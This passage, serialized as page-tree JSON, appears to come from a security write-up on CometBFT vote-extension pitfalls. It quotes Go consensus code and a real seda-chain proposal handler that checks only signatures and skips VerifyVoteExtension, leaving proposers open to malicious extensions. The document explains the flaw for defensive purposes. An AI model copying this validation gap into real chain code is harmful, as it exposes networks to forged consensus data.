p2p",{"type":27,"tag":207,"props":90615,"children":90616},{"style":238},[90617],{"type":33,"value":1041},{"type":27,"tag":207,"props":90619,"children":90620},{"style":8920},[90621],{"type":33,"value":90622},"ID",{"type":27,"tag":207,"props":90624,"children":90625},{"style":238},[90626],{"type":33,"value":83614},{"type":27,"tag":207,"props":90628,"children":90629},{"style":220},[90630],{"type":33,"value":90631},"added",{"type":27,"tag":207,"props":90633,"children":90634},{"style":8920},[90635],{"type":33,"value":19327},{"type":27,"tag":207,"props":90637,"children":90638},{"style":238},[90639],{"type":33,"value":1123},{"type":27,"tag":207,"props":90641,"children":90642},{"style":220},[90643],{"type":33,"value":55659},{"type":27,"tag":207,"props":90645,"children":90646},{"style":8920},[90647],{"type":33,"value":22151},{"type":27,"tag":207,"props":90649,"children":90650},{"style":238},[90651],{"type":33,"value":1424},{"type":27,"tag":207,"props":90653,"children":90654},{"class":209,"line":244},[90655],{"type":27,"tag":207,"props":90656,"children":90657},{"style":226},[90658],{"type":33,"value":27611},{"type":27,"tag":207,"props":90660,"children":90661},{"class":209,"line":270},[90662],{"type":27,"tag":207,"props":90663,"children":90664},{"emptyLinePlaceholder":19},[90665],{"type":33,"value":2062},{"type":27,"tag":207,"props":90667,"children":90668},{"class":209,"line":296},[90669],{"type":27,"tag":207,"props":90670,"children":90671},{"style":4647},[90672],{"type":33,"value":90673}," // A precommit for the previous height?\n",{"type":27,"tag":207,"props":90675,"children":90676},{"class":209,"line":445},[90677],{"type":27,"tag":207,"props":90678,"children":90679},{"style":4647},[90680],{"type":33,"value":90681}," // These come in while we wait timeoutCommit\n",{"type":27,"tag":207,"props":90683,"children":90684},{"class":209,"line":867},[90685,90689,90694,90698,90703,90707,90711,90715,90720,90724,90728,90732,90736,90740,90745,90749,90753,90757,90762],{"type":27,"tag":207,"props":90686,"children":90687},{"style":376},[90688],{"type":33,"value":19556},{"type":27,"tag":207,"props":90690,"children":90691},{"style":220},[90692],{"type":33,"value":90693}," vote",{"type":27,"tag":207,"props":90695,"children":90696},{"style":238},[90697],{"type":33,"value":1041},{"type":27,"tag":207,"props":90699,"children":90700},{"style":220},[90701],{"type":33,"value":90702},"Height",{"type":27,"tag":207,"props":90704,"children":90705},{"style":226},[90706],{"type":33,"value":2227},{"type":27,"tag":207,"props":90708,"children":90709},{"style":232},[90710],{"type":33,"value":1651},{"type":27,"tag":207,"props":90712,"children":90713},{"style":226},[90714],{"type":33,"value":10572},{"type":27,"tag":207,"props":90716,"children":90717},{"style":220},[90718],{"type":33,"value":90719}," cs",{"type":27,"tag":207,"props":90721,"children":90722},{"style":238},[90723],{"type":33,"value":1041},{"type":27,"tag":207,"props":90725,"children":90726},{"style":220},[90727],{"type":33,"value":90702},{"type":27,"tag":207,"props":90729,"children":90730},{"style":226},[90731],{"type":33,"value":21461},{"type":27,"tag":207,"props":90733,"children":90734},{"style":220},[90735],{"type":33,"value":90693},{"type":27,"tag":207,"props":90737,"children":90738},{"style":238},[90739],{"type":33,"value":1041},{"type":27,"tag":207,"props":90741,"children":90742},{"style":220},[90743],{"type":33,"value":90744},"Type",{"type":27,"tag":207,"props":90746,"children":90747},{"style":226},[90748],{"type":33,"value":10572},{"type":27,"tag":207,"props":90750,"children":90751},{"style":220},[90752],{"type":33,"value":85406},{"type":27,"tag":207,"props":90754,"children":90755},{"style":238},[90756],{"type":33,"value":1041},{"type":27,"tag":207,"props":90758,"children":90759},{"style":220},[90760],{"type":33,"value":90761},"PrecommitType",{"type":27,"tag":207,"props":90763,"children":90764},{"style":238},[90765],{"type":33,"value":384},{"type":27,"tag":207,"props":90767,"children":90768},{"class":209,"line":892},[90769],{"type":27,"tag":207,"props":90770,"children":90771},{"style":226},[90772],{"type":33,"value":89065},{"type":27,"tag":207,"props":90774,"children":90775},{"class":209,"line":1475},[90776],{"type":27,"tag":207,"props":90777,"children":90778},{"style":4647},[90779],{"type":33,"value":90780}," // Late precommits are not checked by VerifyVoteExtension\n",{"type":27,"tag":207,"props":90782,"children":90783},{"class":209,"line":2065},[90784,90789,90793,90797,90801,90805,90809,90814,90818,90823,90827,90831],{"type":27,"tag":207,"props":90785,"children":90786},{"style":220},[90787],{"type":33,"value":90788}," added",{"type":27,"tag":207,"props":90790,"children":90791},{"style":238},[90792],{"type":33,"value":1123},{"type":27,"tag":207,"props":90794,"children":90795},{"style":220},[90796],{"type":33,"value":55659},{"type":27,"tag":207,"props":90798,"children":90799},{"style":226},[90800],{"type":33,"value":229},{"type":27,"tag":207,"props":90802,"children":90803},{"style":220},[90804],{"type":33,"value":90719},{"type":27,"tag":207,"props":90806,"children":90807},{"style":238},[90808],{"type":33,"value":1041},{"type":27,"tag":207,"props":90810,"children":90811},{"style":220},[90812],{"type":33,"value":90813},"LastCommit",{"type":27,"tag":207,"props":90815,"children":90816},{"style":238},[90817],{"type":33,"value":1041},{"type":27,"tag":207,"props":90819,"children":90820},{"style":1335},[90821],{"type":33,"value":90822},"AddVote",{"type":27,"tag":207,"props":90824,"children":90825},{"style":238},[90826],{"type":33,"value":1343},{"type":27,"tag":207,"props":90828,"children":90829},{"style":220},[90830],{"type":33,"value":90582},{"type":27,"tag":207,"props":90832,"children":90833},{"style":238},[90834],{"type":33,"value":10449},{"type":27,"tag":207,"props":90836,"children":90837},{"class":209,"line":2092},[90838],{"type":27,"tag":207,"props":90839,"children":90840},{"style":226},[90841],{"type":33,"value":89065},{"type":27,"tag":207,"props":90843,"children":90844},{"class":209,"line":2130},[90845,90849,90854,90858],{"type":27,"tag":207,"props":90846,"children":90847},{"style":376},[90848],{"type":33,"value":23019},{"type":27,"tag":207,"props":90850,"children":90851},{"style":220},[90852],{"type":33,"value":90853}," added",{"type":27,"tag":207,"props":90855,"children":90856},{"style":238},[90857],{"type":33,"value":1123},{"type":27,"tag":207,"props":90859,"children":90860},{"style":220},[90861],{"type":33,"value":90862},"err\n",{"type":27,"tag":207,"props":90864,"children":90865},{"class":209,"line":2168},[90866],{"type":27,"tag":207,"props":90867,"children":90868},{"style":238},[90869],{"type":33,"value":10645},{"type":27,"tag":207,"props":90871,"children":90872},{"class":209,"line":4095},[90873,90878,90882,90886,90890,90895,90899,90904,90908,90913,90917,90922,90926,90930,90934,90938],{"type":27,"tag":207,"props":90874,"children":90875},{"style":220},[90876],{"type":33,"value":90877}," extEnabled",{"type":27,"tag":207,"props":90879,"children":90880},{"style":226},[90881],{"type":33,"value":83648},{"type":27,"tag":207,"props":90883,"children":90884},{"style":220},[90885],{"type":33,"value":90719},{"type":27,"tag":207,"props":90887,"children":90888},{"style":238},[90889],{"type":33,"value":1041},{"type":27,"tag":207,"props":90891,"children":90892},{"style":220},[90893],{"type":33,"value":90894},"state",{"type":27,"tag":207,"props":90896,"children":90897},{"style":238},[90898],{"type":33,"value":1041},{"type":27,"tag":207,"props":90900,"children":90901},{"style":220},[90902],{"type":33,"value":90903},"ConsensusParams",{"type":27,"tag":207,"props":90905,"children":90906},{"style":238},[90907],{"type":33,"value":1041},{"type":27,"tag":207,"props":90909,"children":90910},{"style":220},[90911],{"type":33,"value":90912},"Feature",{"type":27,"tag":207,"props":90914,"children":90915},{"style":238},[90916],{"type":33,"value":1041},{"type":27,"tag":207,"props":90918,"children":90919},{"style":1335},[90920],{"type":33,"value":90921},"VoteExtensionsEnabled",{"type":27,"tag":207,"props":90923,"children":90924},{"style":238},[90925],{"type":33,"value":1343},{"type":27,"tag":207,"props":90927,"children":90928},{"style":220},[90929],{"type":33,"value":90582},{"type":27,"tag":207,"props":90931,"children":90932},{"style":238},[90933],{"type":33,"value":1041},{"type":27,"tag":207,"props":90935,"children":90936},{"style":220},[90937],{"type":33,"value":90702},{"type":27,"tag":207,"props":90939,"children":90940},{"style":238},[90941],{"type":33,"value":10449},{"type":27,"tag":207,"props":90943,"children":90944},{"class":209,"line":4103},[90945,90949,90954],{"type":27,"tag":207,"props":90946,"children":90947},{"style":376},[90948],{"type":33,"value":19556},{"type":27,"tag":207,"props":90950,"children":90951},{"style":220},[90952],{"type":33,"value":90953}," extEnabled",{"type":27,"tag":207,"props":90955,"children":90956},{"style":238},[90957],{"type":33,"value":384},{"type":27,"tag":207,"props":90959,"children":90960},{"class":209,"line":4154},[90961],{"type":27,"tag":207,"props":90962,"children":90963},{"style":226},[90964],{"type":33,"value":89065},{"type":27,"tag":207,"props":90966,"children":90967},{"class":209,"line":4203},[90968,90972,90976,90980,90984,90988,90992,90996,91000,91004,91008,91012,91016,91021,91025,91030,91034],{"type":27,"tag":207,"props":90969,"children":90970},{"style":376},[90971],{"type":33,"value":10562},{"type":27,"tag":207,"props":90973,"children":90974},{"style":220},[90975],{"type":33,"value":90693},{"type":27,"tag":207,"props":90977,"children":90978},{"style":238},[90979],{"type":33,"value":1041},{"type":27,"tag":207,"props":90981,"children":90982},{"style":220},[90983],{"type":33,"value":90744},{"type":27,"tag":207,"props":90985,"children":90986},{"style":226},[90987],{"type":33,"value":10572},{"type":27,"tag":207,"props":90989,"children":90990},{"style":220},[90991],{"type":33,"value":85406},{"type":27,"tag":207,"props":90993,"children":90994},{"style":238},[90995],{"type":33,"value":1041},{"type":27,"tag":207,"props":90997,"children":90998},{"style":220},[90999],{"type":33,"value":90761},{"type":27,"tag":207,"props":91001,"children":91002},{"style":226},[91003],{"type":33,"value":21461},{"type":27,"tag":207,"props":91005,"children":91006},{"style":226},[91007],{"type":33,"value":20141},{"type":27,"tag":207,"props":91009,"children":91010},{"style":220},[91011],{"type":33,"value":90582},{"type":27,"tag":207,"props":91013,"children":91014},{"style":238},[91015],{"type":33,"value":1041},{"type":27,"tag":207,"props":91017,"children":91018},{"style":220},[91019],{"type":33,"value":91020},"BlockID",{"type":27,"tag":207,"props":91022,"children":91023},{"style":238},[91024],{"type":33,"value":1041},{"type":27,"tag":207,"props":91026,"children":91027},{"style":1335},[91028],{"type":33,"value":91029},"IsNil",{"type":27,"tag":207,"props":91031,"children":91032},{"style":238},[91033],{"type":33,"value":21319},{"type":27,"tag":207,"props":91035,"children":91036},{"style":226},[91037],{"type":33,"value":91038},"&&\n",{"type":27,"tag":207,"props":91040,"children":91041},{"class":209,"line":4249},[91042,91047,91052,91056,91060,91064,91068,91072,91077,91081,91086,91090],{"type":27,"tag":207,"props":91043,"children":91044},{"style":226},[91045],{"type":33,"value":91046}," !",{"type":27,"tag":207,"props":91048,"children":91049},{"style":220},[91050],{"type":33,"value":91051},"bytes",{"type":27,"tag":207,"props":91053,"children":91054},{"style":238},[91055],{"type":33,"value":1041},{"type":27,"tag":207,"props":91057,"children":91058},{"style":1335},[91059],{"type":33,"value":89521},{"type":27,"tag":207,"props":91061,"children":91062},{"style":238},[91063],{"type":33,"value":1343},{"type":27,"tag":207,"props":91065,"children":91066},{"style":220},[91067],{"type":33,"value":90582},{"type":27,"tag":207,"props":91069,"children":91070},{"style":238},[91071],{"type":33,"value":1041},{"type":27,"tag":207,"props":91073,"children":91074},{"style":220},[91075],{"type":33,"value":91076},"ValidatorAddress",{"type":27,"tag":207,"props":91078,"children":91079},{"style":238},[91080],{"type":33,"value":1123},{"type":27,"tag":207,"props":91082,"children":91083},{"style":220},[91084],{"type":33,"value":91085},"myAddr",{"type":27,"tag":207,"props":91087,"children":91088},{"style":238},[91089],{"type":33,"value":31253},{"type":27,"tag":207,"props":91091,"children":91092},{"style":4647},[91093],{"type":33,"value":91094},"// Skip the VerifyVoteExtension call if the vote was issued by this validator.\n",{"type":27,"tag":207,"props":91096,"children":91097},{"class":209,"line":4290},[91098],{"type":27,"tag":207,"props":91099,"children":91100},{"style":226},[91101],{"type":33,"value":89741},{"type":27,"tag":207,"props":91103,"children":91104},{"class":209,"line":4304},[91105,91109,91113,91117,91121,91126,91130,91134,91138,91143,91147,91152,91156,91160],{"type":27,"tag":207,"props":91106,"children":91107},{"style":220},[91108],{"type":33,"value":89559},{"type":27,"tag":207,"props":91110,"children":91111},{"style":226},[91112],{"type":33,"value":83648},{"type":27,"tag":207,"props":91114,"children":91115},{"style":220},[91116],{"type":33,"value":90719},{"type":27,"tag":207,"props":91118,"children":91119},{"style":238},[91120],{"type":33,"value":1041},{"type":27,"tag":207,"props":91122,"children":91123},{"style":220},[91124],{"type":33,"value":91125},"blockExec",{"type":27,"tag":207,"props":91127,"children":91128},{"style":238},[91129],{"type":33,"value":1041},{"type":27,"tag":207,"props":91131,"children":91132},{"style":1335},[91133],{"type":33,"value":90387},{"type":27,"tag":207,"props":91135,"children":91136},{"style":238},[91137],{"type":33,"value":1343},{"type":27,"tag":207,"props":91139,"children":91140},{"style":220},[91141],{"type":33,"value":91142},"context",{"type":27,"tag":207,"props":91144,"children":91145},{"style":238},[91146],{"type":33,"value":1041},{"type":27,"tag":207,"props":91148,"children":91149},{"style":1335},[91150],{"type":33,"value":91151},"TODO",{"type":27,"tag":207,"props":91153,"children":91154},{"style":238},[91155],{"type":33,"value":25646},{"type":27,"tag":207,"props":91157,"children":91158},{"style":220},[91159],{"type":33,"value":90582},{"type":27,"tag":207,"props":91161,"children":91162},{"style":238},[91163],{"type":33,"value":10449},{"type":27,"tag":207,"props":91165,"children":91166},{"class":209,"line":5466},[91167],{"type":27,"tag":207,"props":91168,"children":91169},{"style":226},[91170],{"type":33,"value":89741},{"type":27,"tag":207,"props":91172,"children":91173},{"class":209,"line":5530},[91174],{"type":27,"tag":207,"props":91175,"children":91176},{"style":238},[91177],{"type":33,"value":10637},{"type":27,"tag":207,"props":91179,"children":91180},{"class":209,"line":7900},[91181,91185,91189,91193],{"type":27,"tag":207,"props":91182,"children":91183},{"style":238},[91184],{"type":33,"value":23054},{"type":27,"tag":207,"props":91186,"children":91187},{"style":376},[91188],{"type":33,"value":10605},{"type":27,"tag":207,"props":91190,"children":91191},{"style":376},[91192],{"type":33,"value":23063},{"type":27,"tag":207,"props":91194,"children":91195},{"style":238},[91196],{"type":33,"value":384},{"type":27,"tag":207,"props":91198,"children":91199},{"class":209,"line":7909},[91200],{"type":27,"tag":207,"props":91201,"children":91202},{"style":226},[91203],{"type":33,"value":89065},{"type":27,"tag":207,"props":91205,"children":91206},{"class":209,"line":7917},[91207],{"type":27,"tag":207,"props":91208,"children":91209},{"style":238},[91210],{"type":33,"value":10645},{"type":27,"tag":207,"props":91212,"children":91213},{"class":209,"line":7926},[91214],{"type":27,"tag":207,"props":91215,"children":91216},{"style":226},[91217],{"type":33,"value":27611},{"type":27,"tag":207,"props":91219,"children":91220},{"class":209,"line":7934},[91221],{"type":27,"tag":207,"props":91222,"children":91223},{"style":238},[91224],{"type":33,"value":451},{"type":27,"tag":36,"props":91226,"children":91227},{},[91228],{"type":33,"value":91229},"If developers are not aware of the subtle details regarding vote extension handling in CometBTF, it is quite easy to overlook implementing protections against these attacks.",{"type":27,"tag":58,"props":91231,"children":91233},{"id":91232},"real-world-examples-4",[91234],{"type":33,"value":83920},{"type":27,"tag":36,"props":91236,"children":91237},{},[91238,91240,91245,91247,91253,91255,91261],{"type":33,"value":91239},"An example of the bug we just described is shown here. ",{"type":27,"tag":84,"props":91241,"children":91243},{"className":91242},[],[91244],{"type":33,"value":90366},{"type":33,"value":91246}," only checks that each vote is properly signed by a validator in ",{"type":27,"tag":84,"props":91248,"children":91250},{"className":91249},[],[91251],{"type":33,"value":91252},"ValidateVoteExtension",{"type":33,"value":91254}," but does not verify it against the rules in ",{"type":27,"tag":84,"props":91256,"children":91258},{"className":91257},[],[91259],{"type":33,"value":91260},"VerifyVoteExtention.",{"type":33,"value":91262}," Therefore leaving the leader vulnerable to accepting malicious vote extensions in their proposals.",{"type":27,"tag":36,"props":91264,"children":91265},{},[91266],{"type":27,"tag":47,"props":91267,"children":91270},{"href":91268,"rel":91269},"https://github.com/sedaprotocol/seda-chain/blob/66c1b593fa81c7d443ab5fa82757b45e68597f49/app/abci/handlers.go#L180",[51],[91271],{"type":33,"value":83970},{"type":27,"tag":101,"props":91273,"children":91275},{"code":91274,"language":83397,"meta":7,"className":83398,"style":7},"func (h *Handlers) PrepareProposalHandler() sdk.PrepareProposalHandler {\n return func(ctx sdk.Context, req *abcitypes.RequestPrepareProposal) (*abcitypes.ResponsePrepareProposal, error) {\n ...\n var injection []byte\n if req.Height > ctx.ConsensusParams().Abci.VoteExtensionsEnableHeight && collectSigs {\n //Fails to verify vote extensions with VerifyVoteExtension rules\n err := baseapp.ValidateVoteExtensions(ctx, h.stakingKeeper, req.Height, ctx.ChainID(), req.LocalLastCommit)\n if err != nil {\n return nil, err\n }\n injection, err = json.Marshal(req.LocalLastCommit)\n if err != nil {\n h.logger.Error(\"failed to marshal extended votes\", \"err\", err)\n return nil, err\n }\n ...\n }\n defaultRes, err := h.defaultPrepareProposal(ctx, req)\n ...\n proposalTxs := defaultRes.Txs\n if injection != nil {\n proposalTxs = append([][]byte{injection}, proposalTxs...)\n h.logger.Debug(\"injected local last commit\", \"height\", req.Height)\n }\n return &abcitypes.ResponsePrepareProposal{\n Txs: proposalTxs,\n }, nil\n }\n}\n",[91276],{"type":27,"tag":84,"props":91277,"children":91278},{"__ignoreMap":7},[91279,91333,91424,91431,91452,91519,91527,91632,91655,91674,91681,91735,91758,91813,91832,91839,91846,91853,91907,91914,91940,91963,92015,92077,92084,92111,92131,92143,92150],{"type":27,"tag":207,"props":91280,"children":91281},{"class":209,"line":210},[91282,91286,91290,91295,91299,91304,91308,91313,91317,91321,91325,91329],{"type":27,"tag":207,"props":91283,"children":91284},{"style":214},[91285],{"type":33,"value":2085},{"type":27,"tag":207,"props":91287,"children":91288},{"style":238},[91289],{"type":33,"value":686},{"type":27,"tag":207,"props":91291,"children":91292},{"style":220},[91293],{"type":33,"value":91294},"h ",{"type":27,"tag":207,"props":91296,"children":91297},{"style":226},[91298],{"type":33,"value":9286},{"type":27,"tag":207,"props":91300,"children":91301},{"style":8920},[91302],{"type":33,"value":91303},"Handlers",{"type":27,"tag":207,"props":91305,"children":91306},{"style":238},[91307],{"type":33,"value":2222},{"type":27,"tag":207,"props":91309,"children":91310},{"style":1335},[91311],{"type":33,"value":91312},"PrepareProposalHandler",{"type":27,"tag":207,"props":91314,"children":91315},{"style":238},[91316],{"type":33,"value":21319},{"type":27,"tag":207,"props":91318,"children":91319},{"style":8920},[91320],{"type":33,"value":85961},{"type":27,"tag":207,"props":91322,"children":91323},{"style":238},[91324],{"type":33,"value":1041},{"type":27,"tag":207,"props":91326,"children":91327},{"style":8920},[91328],{"type":33,"value":91312},{"type":27,"tag":207,"props":91330,"children":91331},{"style":238},[91332],{"type":33,"value":384},{"type":27,"tag":207,"props":91334,"children":91335},{"class":209,"line":244},[91336,91340,91344,91348,91352,91356,91360,91364,91368,91373,91377,91382,91386,91391,91395,91399,91403,91407,91412,91416,91420],{"type":27,"tag":207,"props":91337,"children":91338},{"style":376},[91339],{"type":33,"value":8986},{"type":27,"tag":207,"props":91341,"children":91342},{"style":214},[91343],{"type":33,"value":2024},{"type":27,"tag":207,"props":91345,"children":91346},{"style":238},[91347],{"type":33,"value":1343},{"type":27,"tag":207,"props":91349,"children":91350},{"style":220},[91351],{"type":33,"value":27552},{"type":27,"tag":207,"props":91353,"children":91354},{"style":8920},[91355],{"type":33,"value":85872},{"type":27,"tag":207,"props":91357,"children":91358},{"style":238},[91359],{"type":33,"value":1041},{"type":27,"tag":207,"props":91361,"children":91362},{"style":8920},[91363],{"type":33,"value":83581},{"type":27,"tag":207,"props":91365,"children":91366},{"style":238},[91367],{"type":33,"value":1123},{"type":27,"tag":207,"props":91369,"children":91370},{"style":220},[91371],{"type":33,"value":91372},"req",{"type":27,"tag":207,"props":91374,"children":91375},{"style":226},[91376],{"type":33,"value":17093},{"type":27,"tag":207,"props":91378,"children":91379},{"style":8920},[91380],{"type":33,"value":91381},"abcitypes",{"type":27,"tag":207,"props":91383,"children":91384},{"style":238},[91385],{"type":33,"value":1041},{"type":27,"tag":207,"props":91387,"children":91388},{"style":8920},[91389],{"type":33,"value":91390},"RequestPrepareProposal",{"type":27,"tag":207,"props":91392,"children":91393},{"style":238},[91394],{"type":33,"value":83614},{"type":27,"tag":207,"props":91396,"children":91397},{"style":226},[91398],{"type":33,"value":9286},{"type":27,"tag":207,"props":91400,"children":91401},{"style":8920},[91402],{"type":33,"value":91381},{"type":27,"tag":207,"props":91404,"children":91405},{"style":238},[91406],{"type":33,"value":1041},{"type":27,"tag":207,"props":91408,"children":91409},{"style":8920},[91410],{"type":33,"value":91411},"ResponsePrepareProposal",{"type":27,"tag":207,"props":91413,"children":91414},{"style":238},[91415],{"type":33,"value":1123},{"type":27,"tag":207,"props":91417,"children":91418},{"style":8920},[91419],{"type":33,"value":22138},{"type":27,"tag":207,"props":91421,"children":91422},{"style":238},[91423],{"type":33,"value":1424},{"type":27,"tag":207,"props":91425,"children":91426},{"class":209,"line":270},[91427],{"type":27,"tag":207,"props":91428,"children":91429},{"style":226},[91430],{"type":33,"value":89065},{"type":27,"tag":207,"props":91432,"children":91433},{"class":209,"line":296},[91434,91438,91443,91447],{"type":27,"tag":207,"props":91435,"children":91436},{"style":214},[91437],{"type":33,"value":87348},{"type":27,"tag":207,"props":91439,"children":91440},{"style":220},[91441],{"type":33,"value":91442}," injection",{"type":27,"tag":207,"props":91444,"children":91445},{"style":238},[91446],{"type":33,"value":83460},{"type":27,"tag":207,"props":91448,"children":91449},{"style":8920},[91450],{"type":33,"value":91451},"byte\n",{"type":27,"tag":207,"props":91453,"children":91454},{"class":209,"line":445},[91455,91459,91464,91468,91472,91476,91480,91484,91488,91492,91497,91501,91506,91510,91515],{"type":27,"tag":207,"props":91456,"children":91457},{"style":376},[91458],{"type":33,"value":10562},{"type":27,"tag":207,"props":91460,"children":91461},{"style":220},[91462],{"type":33,"value":91463}," req",{"type":27,"tag":207,"props":91465,"children":91466},{"style":238},[91467],{"type":33,"value":1041},{"type":27,"tag":207,"props":91469,"children":91470},{"style":220},[91471],{"type":33,"value":90702},{"type":27,"tag":207,"props":91473,"children":91474},{"style":226},[91475],{"type":33,"value":21470},{"type":27,"tag":207,"props":91477,"children":91478},{"style":220},[91479],{"type":33,"value":33108},{"type":27,"tag":207,"props":91481,"children":91482},{"style":238},[91483],{"type":33,"value":1041},{"type":27,"tag":207,"props":91485,"children":91486},{"style":1335},[91487],{"type":33,"value":90903},{"type":27,"tag":207,"props":91489,"children":91490},{"style":238},[91491],{"type":33,"value":37429},{"type":27,"tag":207,"props":91493,"children":91494},{"style":220},[91495],{"type":33,"value":91496},"Abci",{"type":27,"tag":207,"props":91498,"children":91499},{"style":238},[91500],{"type":33,"value":1041},{"type":27,"tag":207,"props":91502,"children":91503},{"style":220},[91504],{"type":33,"value":91505},"VoteExtensionsEnableHeight",{"type":27,"tag":207,"props":91507,"children":91508},{"style":226},[91509],{"type":33,"value":21461},{"type":27,"tag":207,"props":91511,"children":91512},{"style":220},[91513],{"type":33,"value":91514}," collectSigs",{"type":27,"tag":207,"props":91516,"children":91517},{"style":238},[91518],{"type":33,"value":384},{"type":27,"tag":207,"props":91520,"children":91521},{"class":209,"line":867},[91522],{"type":27,"tag":207,"props":91523,"children":91524},{"style":4647},[91525],{"type":33,"value":91526}," //Fails to verify vote extensions with VerifyVoteExtension rules\n",{"type":27,"tag":207,"props":91528,"children":91529},{"class":209,"line":892},[91530,91534,91538,91543,91547,91552,91556,91560,91564,91569,91573,91578,91582,91586,91590,91594,91598,91602,91606,91611,91615,91619,91623,91628],{"type":27,"tag":207,"props":91531,"children":91532},{"style":220},[91533],{"type":33,"value":89559},{"type":27,"tag":207,"props":91535,"children":91536},{"style":226},[91537],{"type":33,"value":83648},{"type":27,"tag":207,"props":91539,"children":91540},{"style":220},[91541],{"type":33,"value":91542}," baseapp",{"type":27,"tag":207,"props":91544,"children":91545},{"style":238},[91546],{"type":33,"value":1041},{"type":27,"tag":207,"props":91548,"children":91549},{"style":1335},[91550],{"type":33,"value":91551},"ValidateVoteExtensions",{"type":27,"tag":207,"props":91553,"children":91554},{"style":238},[91555],{"type":33,"value":1343},{"type":27,"tag":207,"props":91557,"children":91558},{"style":220},[91559],{"type":33,"value":27552},{"type":27,"tag":207,"props":91561,"children":91562},{"style":238},[91563],{"type":33,"value":1123},{"type":27,"tag":207,"props":91565,"children":91566},{"style":220},[91567],{"type":33,"value":91568},"h",{"type":27,"tag":207,"props":91570,"children":91571},{"style":238},[91572],{"type":33,"value":1041},{"type":27,"tag":207,"props":91574,"children":91575},{"style":220},[91576],{"type":33,"value":91577},"stakingKeeper",{"type":27,"tag":207,"props":91579,"children":91580},{"style":238},[91581],{"type":33,"value":1123},{"type":27,"tag":207,"props":91583,"children":91584},{"style":220},[91585],{"type":33,"value":91372},{"type":27,"tag":207,"props":91587,"children":91588},{"style":238},[91589],{"type":33,"value":1041},{"type":27,"tag":207,"props":91591,"children":91592},{"style":220},[91593],{"type":33,"value":90702},{"type":27,"tag":207,"props":91595,"children":91596},{"style":238},[91597],{"type":33,"value":1123},{"type":27,"tag":207,"props":91599,"children":91600},{"style":220},[91601],{"type":33,"value":27552},{"type":27,"tag":207,"props":91603,"children":91604},{"style":238},[91605],{"type":33,"value":1041},{"type":27,"tag":207,"props":91607,"children":91608},{"style":1335},[91609],{"type":33,"value":91610},"ChainID",{"type":27,"tag":207,"props":91612,"children":91613},{"style":238},[91614],{"type":33,"value":25646},{"type":27,"tag":207,"props":91616,"children":91617},{"style":220},[91618],{"type":33,"value":91372},{"type":27,"tag":207,"props":91620,"children":91621},{"style":238},[91622],{"type":33,"value":1041},{"type":27,"tag":207,"props":91624,"children":91625},{"style":220},[91626],{"type":33,"value":91627},"LocalLastCommit",{"type":27,"tag":207,"props":91629,"children":91630},{"style":238},[91631],{"type":33,"value":10449},{"type":27,"tag":207,"props":91633,"children":91634},{"class":209,"line":1475},[91635,91639,91643,91647,91651],{"type":27,"tag":207,"props":91636,"children":91637},{"style":376},[91638],{"type":33,"value":66034},{"type":27,"tag":207,"props":91640,"children":91641},{"style":220},[91642],{"type":33,"value":55760},{"type":27,"tag":207,"props":91644,"children":91645},{"style":226},[91646],{"type":33,"value":71619},{"type":27,"tag":207,"props":91648,"children":91649},{"style":214},[91650],{"type":33,"value":89141},{"type":27,"tag":207,"props":91652,"children":91653},{"style":238},[91654],{"type":33,"value":384},{"type":27,"tag":207,"props":91656,"children":91657},{"class":209,"line":2065},[91658,91662,91666,91670],{"type":27,"tag":207,"props":91659,"children":91660},{"style":376},[91661],{"type":33,"value":67960},{"type":27,"tag":207,"props":91663,"children":91664},{"style":214},[91665],{"type":33,"value":89141},{"type":27,"tag":207,"props":91667,"children":91668},{"style":238},[91669],{"type":33,"value":1123},{"type":27,"tag":207,"props":91671,"children":91672},{"style":220},[91673],{"type":33,"value":90862},{"type":27,"tag":207,"props":91675,"children":91676},{"class":209,"line":2092},[91677],{"type":27,"tag":207,"props":91678,"children":91679},{"style":238},[91680],{"type":33,"value":66118},{"type":27,"tag":207,"props":91682,"children":91683},{"class":209,"line":2130},[91684,91689,91693,91697,91701,91706,91710,91715,91719,91723,91727,91731],{"type":27,"tag":207,"props":91685,"children":91686},{"style":220},[91687],{"type":33,"value":91688}," injection",{"type":27,"tag":207,"props":91690,"children":91691},{"style":238},[91692],{"type":33,"value":1123},{"type":27,"tag":207,"props":91694,"children":91695},{"style":220},[91696],{"type":33,"value":55659},{"type":27,"tag":207,"props":91698,"children":91699},{"style":226},[91700],{"type":33,"value":229},{"type":27,"tag":207,"props":91702,"children":91703},{"style":220},[91704],{"type":33,"value":91705}," json",{"type":27,"tag":207,"props":91707,"children":91708},{"style":238},[91709],{"type":33,"value":1041},{"type":27,"tag":207,"props":91711,"children":91712},{"style":1335},[91713],{"type":33,"value":91714},"Marshal",{"type":27,"tag":207,"props":91716,"children":91717},{"style":238},[91718],{"type":33,"value":1343},{"type":27,"tag":207,"props":91720,"children":91721},{"style":220},[91722],{"type":33,"value":91372},{"type":27,"tag":207,"props":91724,"children":91725},{"style":238},[91726],{"type":33,"value":1041},{"type":27,"tag":207,"props":91728,"children":91729},{"style":220},[91730],{"type":33,"value":91627},{"type":27,"tag":207,"props":91732,"children":91733},{"style":238},[91734],{"type":33,"value":10449},{"type":27,"tag":207,"props":91736,"children":91737},{"class":209,"line":2168},[91738,91742,91746,91750,91754],{"type":27,"tag":207,"props":91739,"children":91740},{"style":376},[91741],{"type":33,"value":66034},{"type":27,"tag":207,"props":91743,"children":91744},{"style":220},[91745],{"type":33,"value":55760},{"type":27,"tag":207,"props":91747,"children":91748},{"style":226},[91749],{"type":33,"value":71619},{"type":27,"tag":207,"props":91751,"children":91752},{"style":214},[91753],{"type":33,"value":89141},{"type":27,"tag":207,"props":91755,"children":91756},{"style":238},[91757],{"type":33,"value":384},{"type":27,"tag":207,"props":91759,"children":91760},{"class":209,"line":4095},[91761,91766,91770,91775,91779,91783,91787,91792,91796,91801,91805,91809],{"type":27,"tag":207,"props":91762,"children":91763},{"style":220},[91764],{"type":33,"value":91765}," h",{"type":27,"tag":207,"props":91767,"children":91768},{"style":238},[91769],{"type":33,"value":1041},{"type":27,"tag":207,"props":91771,"children":91772},{"style":220},[91773],{"type":33,"value":91774},"logger",{"type":27,"tag":207,"props":91776,"children":91777},{"style":238},[91778],{"type":33,"value":1041},{"type":27,"tag":207,"props":91780,"children":91781},{"style":1335},[91782],{"type":33,"value":44648},{"type":27,"tag":207,"props":91784,"children":91785},{"style":238},[91786],{"type":33,"value":1343},{"type":27,"tag":207,"props":91788,"children":91789},{"style":1325},[91790],{"type":33,"value":91791},"\"failed to marshal extended 